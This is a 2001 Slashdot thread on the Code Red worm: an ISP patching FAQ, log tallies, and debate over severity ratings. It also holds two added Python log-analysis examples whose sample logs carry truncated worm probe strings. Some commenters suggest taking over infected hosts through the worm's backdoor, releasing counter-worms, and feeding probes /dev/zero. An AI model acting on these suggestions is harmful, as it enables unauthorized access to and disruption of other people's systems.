    What Should I Do to Protect Myself from the Code Red Virus:

    Customers who have computers infected with the Code Red or Code Red II virus should download the Code Red patch from Microsoft.

    If you are running a computer(s) with the IIS Web server software and Windows NT or 2000 operating systems, take these steps to protect computers:

    Download the patch
    Disconnect from the Internet (see additional instructions below)
    Reboot your computer
    Run the patch program
    Restart your computer again
    To properly connect and disconnect your computer from the Internet:

    Shut off your computer
    Unplug the cable modem from its power supply
    Wait approximately 30 - 40 seconds
    Plug the cable modem back into the power supply
    Turn your computer back on
    For more information about online security, please visit our AT&T Broadband Security Web site. The site has detailed information about online security and how to protect your high-speed cable Internet service connection.

    Filtering Port 80 Q&As

    Why is AT&T Broadband and Excite@Home Filtering HTTP Port 80, and how Does Filtering that Port Prevent the Code Red Virus from Spreading?

    In an effort to alleviate the spread of the Code Red and Code Red II viruses on the AT&T Broadband High-Speed Cable Internet Network, AT&T Broadband and Excite@Home are indefinitely filtering all incoming traffic on http port 80 for residential customers.

    Since the virus infects computers with the IIS Web server software and Windows NT or 2000 operating systems, the blocking of port 80 traffic is one of the first steps in containing the Code Red viruses on the Excite@Home and AT&T Broadband networks. Containing the Code Red viruses will assist in restoring the AT&T@Home service to the standard our customers have come to expect.

    How does the Port 80 filter affect customers?

    Blocking of inbound port 80 traffic only affects residential customers that are hosting Web servers with their cable modem. Residential customers that subscribe to Excite@Home Webspace or AT&T@Home Personal Pages and are not hosting a Web server are not affected by the filter.

    Are Customers Who Subscribe to AT&T Broadband Business Services Affected by the Port 80 Filter?

    The Port 80 filter only affects AT&T@Home residential customers.

    Why Can't AT&T@Home Residential Customers Run Web Servers?

    The @Home residential service offering is a consumer product designed for your personal use of the Internet. Customers must ensure that their activity does not improperly restrict, inhibit, or degrade any other user's use of the Services, nor represent (in the sole judgment of @Home) an unusually large burden on the network itself.

    The benefits and privileges available from the AT&T@Home, and the Internet in general, must be balanced with duties and responsibilities so that other customers can also have a productive experience.

    Under the terms of the Excite@Home Acceptable Use Policy, the running of Web servers on a residential AT&T@Home account is not permitted. See Bandwidth, Data Storage and Other Limitations in the Excite@Home Acceptable Use Policy.

    *AT&T Broadband does not provide support or endorse most third party applications. If you have questions, concerns or problems with a third party software application, you will need to contact the software manufacturer. In no event shall AT&T Broadband, its agents or officers be liable for any damages whatsoever (including, without limitation, damages to computer Hardware or Software) arising out of the use of or inability to use the Software mentioned above, even if AT&T Broadband has been advised of the possibility of such damages.

    --
    comment directly in my journal
  175. Two Reasons..... by C.Lee · · Score: 0, Insightful

    > I don't understand why Symantec classifies a "remote root" exploit as only "medium"
    > damage. Code Red [?] is hitting cable modem networks especially hard,

    1) Microsoft asked (told) them to.

    2) Their software doesn't do squat against worms like Code Red.

  176. forgive my ignorance by Anonymous Coward · · Score: 0

    I have been watching this code red stuff now for weeks with only a passive interest as I have other things to do and I don't feel any threat here on my slackware box. I haven't been particularly irritated either although the school's network seems a bit slower reaching out to the web. But I got one question: is the person(s) responsible for this known? and how will they be punished for all the bandwidth they have wasted?

    1. Re:forgive my ignorance by gamorck · · Score: 0

      Don't count your chickens pal. Based on the fact that the Melissa guy hasn't served a day of time yet (see theregister) - the code red guy probably won't even make it to the court.

      Gam
      "Flame At Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  177. Twenty-four hours. by ktakki · · Score: 5, Insightful

    grep ida access_log | cut -d" " -f1 | sort | uniq | wc -l
    139

    Looking over the infected hosts, it seems that half are broadband clients (RR, Bellsouth, Verizon, @Home, etc.), a third are overseas (with .de, .tw, and .kr most prevalent), and the remaining sixth are US corporations, including some Fortune 500 hosts.

    I see Code Red as a big boon to jobhunters, especially those looking for SA work. Right there in your logs is a list of companies that are hiring, whether they know it or not.

    I guess the big question is this: do you root their box before the first interview or after?

    k.

    --
    "In spite of everything, I still believe that people are really good at heart." - Anne Frank
  178. Code Red+White+Blue by jamesmartinluther · · Score: 1
    I was talking with a friend last night and we were joking that we should write a "patriotic" anti-worm worm which spreads itself and, once it has infected a vulnerable system, fixes this stupid problem.

    Best of all, it would replace the "hacked by chinese" with a jpg of Wally George's "USA IS #1" space shuttle poster.

    Unfortunately, this would probably land you in just as much trouble as the originator of this mess (er, I mean the worm coders).

  179. Earthlink DSL by Darth+Maul · · Score: 1

    I'm on Earthlink DSL in Northern VA, and my server has been going crazy (on the 4.0.0.0 net).
    Most of my Code Red hits have been from 4.0.0.0 and 24.0.0.0.

    Up past 1200 hits so far just since Sunday. My Code Red hit log can be found here (wonderful Perl script provided by a fellow Slashdotter):

    http://stealthboy.dyndns.org/report.html

    --
    --- witty signature
  180. Do you really know it's "caused enough damage"? by jscott404 · · Score: 1

    It's really assuming to say that "the virus has caused enough damage for AT&T (MediaOne) to cut off port 80 across their network." Has this been confirmed? Is this just ingress or are we talking cutting off web surfing? If it's just the ingress, then it seems they're just trying to help prevent the spread of the virus to their subscribers. ...a noble enough cause, methinks.

  181. I knew it! by cmdrsed · · Score: 1

    Yes, I am unfortunate enough to have AT&T Mediaone cable internet. It was down almost all weekend and then on and off on Monday and today. I suspected it might have been because of the tropical storms in the area but something in my mind told me that they might just be ignorant enough to run IIS and not patch it for the code red worm.

  182. A threat isn't so bad when you're used to it. by pjbass · · Score: 1

    IMHO, the reason they can get away with calling this a "medium" level problem is because of the "standard" out there today. Just look around. Code Red, Code Red 2, SirCam, ILoveYou, and how many other Outlook-borne viruses came out recently? The bar has been "raised", if you will, to a level of tolerance of remote root exploits and remote compromises that people have become numb to it. I know that sounds far-fetched to some, but how often do you hear about a new virus (take Code Red for example), and just brush it off as normal, or not life-threatening, etc.? People have been reading all about Code Red the last few weeks, about its potential to bring the internet to its knees, and the general response has been comatose. Average people just accept these things as "normal," so the average user will accept this as normal.

    Just to show I don't completely pick on Windows-based products, when SSH 3.0.0 came out, it had one of the worst root exploits (well, exploit that can gain root) in awhile. What happened? CERT fired out an advisory, SSH wrote a patch, and people moved on, without there being a horrible mess. It is just accepted that sh*t happens, and that's that.

  183. To make things worse, Code Red fixes break shit by Anonymous Coward · · Score: 0

    We installed the fix, and now it broke our OWA access as well as Veritas. Fucking 'A

  184. STILL Logging the worm by The_Weevil · · Score: 1

    I'm logging code red trying to attack my gateway (live with a dummy file ;). Check out the log: www.baxpace.com/gateway

    You'll have to copy and paste that link because i only really want people who can be bothered to do that, i still want to have access to the web :).

    You can download the viral code there. V2 is the only one that's attacked me so far, spreading over BT Openworld's subnet like wildfire. If a new variant in the code appears, the site will pick it up and store it :)

    Weevil

    --
    ghaa.
  185. in case anyone cares by Anonymous Coward · · Score: 0
    Since July 19th ...

    $ grep default.ida /usr/local/apache/logs/access_log | wc -l
    2106
    $ grep default.ida /usr/local/apache/logs/access_log | awk '{print $1}' | sort | uniq |wc -l
    868
    $ ifconfig eth0 | grep inet
    inet addr:24.79.x.x Bcast:24.79.x.255 Mask:255.255.255.0
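    This post and comment 177 above both count unique Code Red sources with a grep | sort | uniq one-liner. The script below is an added example (not code from either poster) that does the same job over constructed log lines and also splits the hits by variant (the XXXX filler of Code Red I versus the NNNN filler of Code Red II) and by how close each source is to the local /8 and /16, which is where Code Red II's preference for nearby addresses shows up. The local address 24.79.5.5 and every source address are constructed; the default.ida filler in the sample lines is truncated.

```python
"""Tally Code Red probes in an Apache access_log by variant and by source
closeness.  Added example: the log lines below are constructed, not a real
capture, and the default.ida filler is shortened from the worm's 224-byte
run of X or N characters."""
import ipaddress
import re
from collections import Counter

# Constructed sample in Apache common log format (six probes from five
# sources plus one ordinary request).  Addresses are illustrative only.
SAMPLE_LOG = """\
24.79.12.5 - - [08/Aug/2001:06:00:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 287
24.79.12.5 - - [08/Aug/2001:06:02:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 287
24.79.200.17 - - [08/Aug/2001:06:03:31 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 287
24.130.8.2 - - [08/Aug/2001:06:04:02 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 287
4.33.1.9 - - [08/Aug/2001:06:04:40 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 287
65.96.70.231 - - [08/Aug/2001:06:05:12 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 287
203.0.113.8 - - [08/Aug/2001:06:05:30 -0400] "GET /index.html HTTP/1.0" 200 1024
"""

# Common log format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_probe(path):
    """Return 'CodeRed-I', 'CodeRed-II', 'default.ida-other', or None when the
    request is not a default.ida probe at all.  The variant is told apart by
    the filler the worm puts before the %u-encoded part of the query."""
    if not path.lower().startswith('/default.ida'):
        return None
    query = path.partition('?')[2]
    if query.startswith('XXXX'):
        return 'CodeRed-I'
    if query.startswith('NNNN'):
        return 'CodeRed-II'
    return 'default.ida-other'


def nearness(src, local):
    """Bucket a source address relative to the local address.  Code Red II
    scans the same /8 and /16 far more often than random addresses, so a
    heavy 'same /16' bucket is the signature of an infected neighbour."""
    sp = ipaddress.ip_address(src).packed
    lp = ipaddress.ip_address(local).packed
    if sp[:2] == lp[:2]:
        return 'same /16'
    if sp[:1] == lp[:1]:
        return 'same /8'
    return 'elsewhere'


def summarize(log_text, local_ip):
    """Walk the log once and return hit count, unique probing sources,
    per-variant counts and, per unique source, the nearness bucket."""
    hits = 0
    sources = set()
    variants = Counter()
    near = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        variant = classify_probe(m['path'])
        if variant is None:
            continue  # ordinary request, not a probe
        hits += 1
        variants[variant] += 1
        if m['ip'] not in sources:
            sources.add(m['ip'])
            near[nearness(m['ip'], local_ip)] += 1
    return {
        'hits': hits,
        'unique_sources': len(sources),
        'variants': dict(variants),
        'nearness': dict(near),
    }


if __name__ == '__main__':
    import json
    import sys
    # Usage: python codered_tally.py [access_log]; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(json.dumps(summarize(text, '24.79.5.5'), indent=2))
```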

  186. It is "medium" because hysteria won't help us by Pac · · Score: 4, Insightful

    It's been already shown that Code Red will not bring the Internet down. And it was never very much of a mortal threat to the majority of the users out there, because those are not running IIS (or any http server, for that matter). And until the more recent versions, the worm was not even a menace to the files in the infected system (the recent versions, by installing a backdoor, would allow for a malicious invader to do a lot more damage).

    The kind editor should also remember his math and Netcraft's nice figures. IIS installations represent some 25% of the servers out there. Most of those are already patched by now. Even when they were not patched Code Red got only 6-7% of them (considering 4 million servers/250 thousand infected).

    Code Red is certainly a local problem in networks where it finds a nice ecological niche. Cable modem networks are likely to suffer due to their architecture and their own flaws. Other networks will suffer down the road.

    But the main point is that this particular worm is out of the way for most of us (if it ever was in the way) and will only affect the bandwidth locally.

    It is almost time to reduce its risk rating to low.

    1. Re:It is "medium" because hysteria won't help us by danox · · Score: 1

      See, the thing with Code Red is you don't need to have the virus to suffer from it.

      My company uses domino HTTP servers and so we are safe from CR, however I am currently developing a system for another company, which depends on maintaining connectivity to their database servers. However their ISP has closed off all access to their servers due to the fact that they were getting hit by code red so hard (from servers outside their network that were infected) that they actually couldn't afford to pay for all the extra network traffic. So the ISP basically went offline, leaving me sitting here reading slashdot with deadlines fast approaching.

      It seems to me that CR is a threat to businesses. Even if you have no way of getting infected, you can still get messed around indirectly by it.

      --
      "Me and my girl named bimbo . . . limbo . . . spam" - Captain Beefheart.
  187. Yes, my local Cox ISP said the arp's are normal. by Anonymous Coward · · Score: 0

    But I too am seeing 30-50 arp requests EVERY SECOND. The tech support people are idiots. They say anything to get you off the phone. Arp requests are used by a machine just coming onto the network to get an address from the DHCP server. That's a once per boot, or at most once per few hours (when the lease expires) event. With 1,500,000 arp requests per hour hitting my modem, it's no wonder my bandwidth has sucked the last week or so.

  188. You misunderstand the danger by Illserve · · Score: 3, Insightful

    Yes, pre-existing worms disappear and no worms of that variety can infect, but in the few minutes of life it had on your system, CodeRed had full access to download other, newer, unpatched, programs that otherwise would be unable to get onboard.

    I reiterate, the only safe path is to install on an airgapped machine, or on a well secured LAN. But if you have to download it from the internet, there is a chance that *anything*, not just CodeRed, will be hiding somewhere by the time you patch.

    1. Re:You misunderstand the danger by interiot · · Score: 1
      You're a moron.

      point 1: the worm has been disassembled, we know what it does. It's not going to suddenly start unpatching IIS for you.

      point 2: yes, in the mean time, other worms can come along, or someone else could use root.exe to install a backdoor. The patch is not going to fix this.

      So: download, patch, reboot ASAP. And then search for any backdoors.

      You won't necessarily find all the backdoors. The logs could have been modified. EXEs could have been patched. Your checksum program could have been patched. You'll either have to gamble that there's no backdoor, or you'll have to reinstall (while employing that nifty "airgap" word of yours).

    2. Re:You misunderstand the danger by Illserve · · Score: 2

      Yea, I'm a moron alright, a moron to continue this conversation with you.

      You've disassembled THIS worm, but every copy of Win2K ships with the IIS vulnerability, so plenty of new worms could be created that do other things.

      Point 2 is exactly my point, the patch is not going to fix the secondary damage caused by the worm in the short time it takes you to destroy it.

      The only real fix for something that can be exploited so quickly would be to issue new copies of win 2K to everyone with this hole patched, but that's not going to happen. So this hole will exist for however long it takes MS to release the Win2k replacement.

      With Linux, on the other hand, new versions come out several times per year, which means the baseline installation for a majority of the users is generally only a few months out of date.

      And "airgap" is not mine, it's been around for quite some time in the security community. It's become a bit outdated with the advent of wireless technology however.

    3. Re:You misunderstand the danger by CharlieG · · Score: 2

      Or turn OFF IIS totally before you connect and download the patch - No IIS running, no way to exploit it - run the patch THEN turn IIS on - no big deal

      --
      -- 73 de KG2V For the Children - RKBA! "You are what you do when it counts" - the Masso
  189. Gee... by Ranger+Rick · · Score: 1

    Lucky for us they caught it in time!

    Oh, wait, they didn't. So what, did the NTBugTraq people hire some reporter to toot their horn for them or something?

    --

    WWJD? JWRTFM!!!

  190. DAMNIT WILL SOMEONE PLEASE.... by 0xffffffff · · Score: 1

    Will someone PLEASE try to write a new version of Code Red (call it Code Blue?) that innoculates computers against Code Red? I mean really.. I can't write it, as I've never written a virus/trojan/etc.. But those of you who can should know a challenge when you see it.

    --
    -- This sentence is false.
  191. Code red growth spurts by Anemophilous+Coward · · Score: 5, Insightful

    We might be in for another growth spurt...when the hundreds of thousands of college students return to campus and plug in their computers. A good portion of them have probably been unattached to the network, or will be brand new machines just for school. Working at a University, we aren't looking forward to this potential new stream of *fun*.

    One possible saving grace is that most of our students come back after the worm is supposed to sleep (20th of the month). However, it might wake again come Sept. 1st. Not to mention any server out there with bad dates ready to spew it around.

    On another note, I've notified several people in other departments that they've been hit with the CR II version. They say "well, I'll just apply the patch". Wrong, that will stop your computer from trying to broadcast the worm. Unfortunately, the patch doesn't clean up the trojan explorer.exe and registry settings. I tell them "you'll need to reformat the whole computer," and they laugh. Well, at least I can be first in line to berate their IT department for not taking that suggestion when their whole network gets compromised from another backdoor installed during the computer's 'open' state.

    -A non-productive mind is with absolutely zero balance.
    - AC

  192. It's been nuking Qwest DSL by WillSeattle · · Score: 1

    They had to totally drop in the MidWest and they've been getting hammered with all our Cisco 675s they "upgraded" us to out here in Seattle.

    I just unplug the box when I'm at work and plug it in when I need to use it, so it can't scan me when I'm dead.

    The reason it's medium is MSFT won't do anything about it, and can cause them more problems if they complain about their inaction. They know which side of the bread has super-glue ...

    --
    --- Will in Seattle - What are you doing to fight the War?
  193. Not an option for ISPs that allow servers. by Anonymous Coward · · Score: 0
    If I get a static IP for an extra $10 per month, my cablemodem ISP (Cox Express in Las Vegas, NOT Cox@Home) explicitly allows customers to run servers. So they had better not shut down port 80.

    I may be safe from Code Red since I run apache, but the default.ida requests coming in every 10 seconds or so is annoying. They do need to kill the flood of arp requests, though. I'm seeing 30 to 50 of these EVERY SECOND! That's about 1,500,000 per hour. Is this the doing of the Code Red worm too? arps shot way up by orders of magnitude over the last few days.

  194. ObPersonalAnecdote by analog_line · · Score: 1
    I'm on Road Runner (AOL/TW) in SA, TX and the traffic light on my cable modem has been blinking nonstop since Saturday night. Thankfully, the first thing I did when I got connected was to get a personal firewall installed. Whenever I'm in Windows the log gets absolutely flooded. In Linux, I don't run any servers save sshd and have a simple "drop everything trying to talk at me" blanket firewall, but it's really degrading performance. Not all the time, but every so often everything slows to a crawl and/or stops altogether.

    Just think what'll happen when someone evolves this thing to use an exploit where there is no patch available. Or more than one exploit. Or a cross-platform virus.

  195. @Home started scanning port 80 last night by Anonymous Coward · · Score: 3, Interesting
    I found this in my Apache log last night (I know, I shouldn't be running servers, but I have them capped using CBQ so they use very little bandwidth):

    24.0.0.203 - - [07/Aug/2001:02:19:23 -0400] "HEAD" 400 - "-" "-"

    24.0.0.203 is authorized-scan1.security.home.net, the machine which has been scanning for NNTP servers on port 119, ever since @Home got threatened with the Usenet death penalty.

    This is the first time @Home has ever scanned my web server. It seems odd that they're sending an invalid request, although this can distinguish between Apache and IIS. Apache will treat this as HTTP/0.9 and will not send back an HTTP header on its error page, while IIS sends an error page with full headers.

    @Home has never blocked ANY port in my area, including 137-139 (I'm on Cogeco@Home). I've connected to my home computer from university over those ports, and successfully transferred files. The modems are capable of simple firewalling, as any DOCSIS modem should be (I've connected to my modem through SNMP and set up some firewall rules, to block connections on port 1214 - my brother was hogging all my upstream bandwidth by using Morpheus/Kazaa).

    I'm still getting tons of hits from Code Red, but I don't really mind. I find it interesting to look through my logs and see the different versions of the worm. Among hundreds of Code Red hits, I have 3 interesting ones. Instead of saying "GET /default.ida?XXXXXX"..., they are just "XXXXXX"..., with the exploit code on the end. Does anyone know what this is? The first hit was around 12:30am last night.

    1. Re:@Home started scanning port 80 last night by Anonymous Coward · · Score: 0

      @Home doesn't control Cogeco's network anyway. They only provide mail and portal services to them now.

    2. Re:@Home started scanning port 80 last night by kilrogg · · Score: 1

      wow, I have a few non-default.ida XXXX too (6 coming from 24.219.87.84, all within a 2 minute interval, and 1 from 24.216.35.134). I thought this was a vulnerability that exploited default.ida specifically, why would they try to infect without default.ida? Can it be there's yet another buffer overflow exploit out there? Or is this just some idiot script kiddies.

  196. OpenBSD by Anonymous Coward · · Score: 0

    Great, I just checked my computer - and IT IS CLEAN !!! I was about to freak out with all the media talking about this weird Internet Worm that attacks web-servers........

  197. What can a good Netizen do? by Refried+Beans · · Score: 1

    I've collected a fair IP list of Code Red infected systems. I would like to do my part and notify these people or their ISP's about their problems. I've sent lists to mediaone.net and home.com, but is that going to do any good? Do the people working at ISP's find this information useful? If so, please post where to send information about Code Red infected PCs.

    1. Re:What can a good Netizen do? by RWC09 · · Score: 1

      There is a story running at maximumlinux. It tells how to setup a script to dig through the log files and e-mail the infected systems.

      --
      -->If Linux was written by Bill Gates & Co. - no one would want to switch !!
  198. filter it in the switch by Bender+Unit+22 · · Score: 1

    I just added a url filtering rule in our Foundry switch so that it blocks all those Red Worm urls. So I don't really care if those MS people patch their servers. Of course that won't help future versions but it does the trick for now.

  199. mediaone EUA ALLOWS FTP AND HTTP SERVERS by emptybody · · Score: 1

    EUA states in section 9(b) this:

    9. Service Characteristics
    (b) FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer.

    --
    comment directly in my journal
  200. Why Symantec says that Code Red is medium. by milkman1 · · Score: 2, Troll

    It is very embarrassing for Microsoft to be responsible for the biggest true worm (as opposed to email worms which can be blocked at a small number of points) in internet history.

    It is well known that Microsoft could easily crush Symantec. Almost all of Symantec's products fill holes in the Windows Family Line that do not exist in other operating systems. According to reports that I have read, the Windows XP betas have firewall software and remote access software; older operating systems have also hurt the viability of Symantec products.

    It is clearly in Symantec's best interest to ensure that Microsoft does not add too many of these new features, and when it does to water them down or license Symantec technology. It would be very easy for Microsoft to include a powerful firewall system based on one of the BSD firewall systems. But instead they have included a weak firewall that most security conscious users would find lacking. Microsoft Scan Disk and Defrag are also both examples of code that have been watered down. The code for defrag is even licensed from Symantec.

    In the past, companies that have made Microsoft look bad have been crushed. Symantec does not want to suffer the same fate.

    1. Re:Why Symantec says that Code Red is medium. by SuiteSisterMary · · Score: 2

      Go search google for 'morris worm.' Then repeat, one hundred times, "every problem that Microsoft is having with security, UNIX had, and continues to have."

      --
      Vintage computer games and RPG books available. Email me if you're interested.
    2. Re:Why Symantec says that Code Red is medium. by milkman1 · · Score: 2

      Please...
      Give me a break.
      Go search google yourself!
      The Morris worm hit less than 6000 computers;
      for a period of time, Code Red was infecting that many computers every three minutes.
      As of July 19th, 359,000 computers were infected
      http://www.cs.berkeley.edu/~srhea/morris-internet-worm.html
      http://www.caida.org/analysis/security/code-red/
      Microsoft is worse than unix for the following reasons.
      1) it is a monoculture, one web server running on one operating system, running on one CPU type. Compare to *nix which has about three popular webservers running on about 20 OS's running on about 10 CPU types. For the OS's and webservers, there are hundreds of different builds. This makes building a worm with good penetration very difficult.

      2.) Most windows admins know almost nothing about their systems. Nuf said.

      This is getting boring and long winded. I have better things to do than explain why windows has such poor security.

    3. Re:Why Symantec says that Code Red is medium. by Anonymous Coward · · Score: 1, Interesting
      Then repeat, one hundred times, "every problem that Microsoft is having with security, UNIX had, and continues to have." [emphasis mine]

      Oh... and you were doing so good until that last part there... Care to point me to the most recent large-scale worm that affected UNIX? What was it... thirteen years ago?

      What you said is partially true, though... UNIX had these problems in the past, but now they're a distant memory. That's the great thing about 30 year old technology: you've had 30 years to iron out the bugs and the security issues.

    4. Re:Why Symantec says that Code Red is medium. by greenrd · · Score: 1
      What was really amusing for me was that when Microsoft ran a "hack this box" challenge a while back, even their own best admins couldn't keep it up without crashing for the whole test! It died multiple times!

      As for whether it was hacked, they said not, but I doubt we'll ever really know, will we?

    5. Re:Why Symantec says that Code Red is medium. by gamorck · · Score: 0

      I believe sadmind ranks up there pal. That was only a few months ago. Yeah it changed IIS pages through the unicode exploit - BUT IT SPREAD OVER SOLARIS using a buffer overflow exploit nearly two years old. It got around too - believe me.

      Look it up if you don't believe me - but you might want to check your facts before shooting off your big mouth next time.

      Gam
      "Flame at Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  201. The real danger by aralin · · Score: 5, Interesting
    The real problem is that all the boxes that are vulnerable to this one specific exploit advertise themselves all over the net! Everyone knows what exploit it is. All you need to do is to read your apache logs and you own at average 400-500 windows boxes to do ANYTHING you want.

    Remote Linux install, anyone?

    --
    If programs would be read like poetry, most programmers would be Vogons.
  202. RR "Virus" Warning by Xwild · · Score: 1
    Well, it appears that RoadRunner is taking it hard as well.. Just got home to find an email from security@rr.com with the subject, "URGENT! VIRUS ALERT!"

    It's nice to see that even RoadRunner security doesn't know the difference between a Virus and a Worm.

    Also nice to know that us linux users either don't count, or are actually susceptible to this "virus". Another quote from their email, "IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOUR ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART." And what about all the Win 3.1, Be, OS/2 users!

    It would be nice if for once, 'security' people would 1) Know what they're talking about 2) Know how to alert people without causing a panic

  203. My stats by JediTrainer · · Score: 2

    My report on this shows that I'm getting hammered quite a bit. Over 2500 attempted attacks, which is eating quite a bit of bandwidth. And yes, I'm on cable.

    My thanks, once again, to the author of the wonderful Perl program which generated this (link available on site).

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  204. PHP to the rescue? by onepower · · Score: 1
    Couldn't a PHP script be written to fix the infected servers? We know their IP addresses and have root access, right?

    --
    Yeah, I use OS X... so sue me.
    1. Re:PHP to the rescue? by AndroidCat · · Score: 1

      I'd rather just use the backdoor in later versions to drop vincentpricelaugh.wav on their computer and play it a few times.

      He had a truly creepy laugh.

      Just kidding!

      --
      One line blog. I hear that they're called Twitters now.
  205. Re:this thing is fascinating - Over 100K attacks.. by Chris_Pugrud · · Score: 2

    Granted I have 3 Class C blocks at Exodus, but since 00:00:01 PST on Sunday I have seen 107,581 port 80 attempts. They currently seem to be running at about 45/minute.

    Chris

    --
    -- I need more coffee. It's Monday. There is no such thing as enough coffee on a Monday.
  206. Hmm, evil or DDoS in the making by Cramer · · Score: 5, Funny

    I know I'm askin' for it, but I couldn't resist:

    cd /home/httpd/html
    ln -s /dev/zero default.ida


    I'm only a 128k ISDN, but with compression, I can push over a T1 worth of zeros :-) (And people say PPPoE has no value.)

    1. Re:Hmm, evil or DDoS in the making by Anonymous Coward · · Score: 0

      Many a greenhorn ircer looking for warez has gotten a few megs of /dev/zero from me :)

      /dcc send photoshop.zip

  207. Code Red...easy fix by Anonymous Coward · · Score: 0

    Somebody needs to write a Code Red style worm that breaks into all these IIS servers and patches them...

  208. 1595 *unique* hits on my road-runner-hosted box by 1010011010 · · Score: 2

    [root@gateway rothwell]# grep default.ida /var/log/httpd/access_log | cut -f1 -d" " | uniq | wc -l
    1595

    --
    Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
    1. Re:1595 *unique* hits on my road-runner-hosted box by Anonymous Coward · · Score: 0


      you forgot to sort, dumbass.

    2. Re:1595 *unique* hits on my road-runner-hosted box by 1010011010 · · Score: 2

      you forgot to sort, dumbass.

      Indeed. I suppose uniq doesn't use a hash table.

      [root@gateway rothwell]# grep default.ida /var/log/httpd/access_log | cut -d " " -f 1 | uniq | wc -l
      1677
      [root@gateway rothwell]# grep default.ida /var/log/httpd/access_log | cut -d " " -f 1 | sort | uniq | wc -l
      630

      --
      Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
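Comments 195 and 208 both come down to reading an Apache log for the worm's requests: telling the usual /default.ida probe from the request lines that are just the "XXXX..." padding with the exploit on the end, and counting distinct sources correctly (uniq only collapses adjacent duplicates, so without a sort in front of it the count is inflated, which is what the corrected pipeline above shows). The Python below is an added example, not code posted by anyone in this thread; the log lines it parses are constructed to look like the ones described, and the padding/%u text is a stand-in, not the worm's actual payload.

```python
import re
from collections import Counter
from itertools import groupby

# Constructed Apache common-log lines (not taken from the thread). PROBE stands in
# for the worm's query string; it is not the real exploit payload.
PROBE = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801"
SAMPLE_LOG = "\n".join([
    f'24.1.2.3 - - [07/Aug/2001:02:19:23 -0400] "GET /default.ida?{PROBE} HTTP/1.0" 404 290',
    f'24.1.2.3 - - [07/Aug/2001:02:19:24 -0400] "GET /default.ida?{PROBE} HTTP/1.0" 404 290',
    f'65.9.8.7 - - [07/Aug/2001:02:20:01 -0400] "GET /default.ida?{PROBE} HTTP/1.0" 404 290',
    '10.0.0.5 - - [07/Aug/2001:02:21:10 -0400] "GET /index.html HTTP/1.1" 200 1043',
    f'24.1.2.3 - - [07/Aug/2001:02:22:00 -0400] "GET /default.ida?{PROBE} HTTP/1.0" 404 290',
    # the oddity from comment 195: no method, no path, the request line is only the padding
    f'24.219.87.84 - - [08/Aug/2001:00:30:12 -0400] "{PROBE}" 400 -',
    f'65.9.8.7 - - [08/Aug/2001:00:31:02 -0400] "GET /default.ida?{PROBE} HTTP/1.0" 404 290',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\S+) (?P<size>\S+)'
)


def parse(log_text):
    """Yield one dict per line in common log format; silently skip anything else."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def classify(request):
    """'default.ida' for the normal probe, 'bare-payload' when the request line
    opens with the padding itself (no method, no path), None for ordinary traffic."""
    if "/default.ida" in request:
        return "default.ida"
    if request.startswith("XXXX"):
        return "bare-payload"
    return None


def count_sources(log_text):
    """Return (runs, unique). `uniq | wc -l` with no sort counts runs of adjacent
    duplicates; `sort | uniq | wc -l` counts distinct addresses."""
    ips = [r["ip"] for r in parse(log_text) if classify(r["req"])]
    runs = sum(1 for _ in groupby(ips))
    unique = len(set(ips))
    return runs, unique


def probe_summary(log_text):
    """Map each probe kind to (hits, distinct source IPs)."""
    hits = Counter()
    sources = {}
    for r in parse(log_text):
        kind = classify(r["req"])
        if kind:
            hits[kind] += 1
            sources.setdefault(kind, set()).add(r["ip"])
    return {k: (hits[k], len(v)) for k, v in sources.items()}


if __name__ == "__main__":
    print("runs vs unique sources:", count_sources(SAMPLE_LOG))
    print(probe_summary(SAMPLE_LOG))
```

On the sample, the run count is 5 while only 3 distinct addresses attacked, the same kind of gap as 1677 versus 630 in the post above; the same address shows up in separate runs because other attackers' lines land between its hits.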
  209. You could stop the IIS service... by thechink · · Score: 1

    before downloading and installing the patch

    or

    choose not to install IIS on installation, download the patch, install IIS while not connected to Internet and then apply patch.

  210. It's ARP packets by Anonymous Coward · · Score: 1, Informative
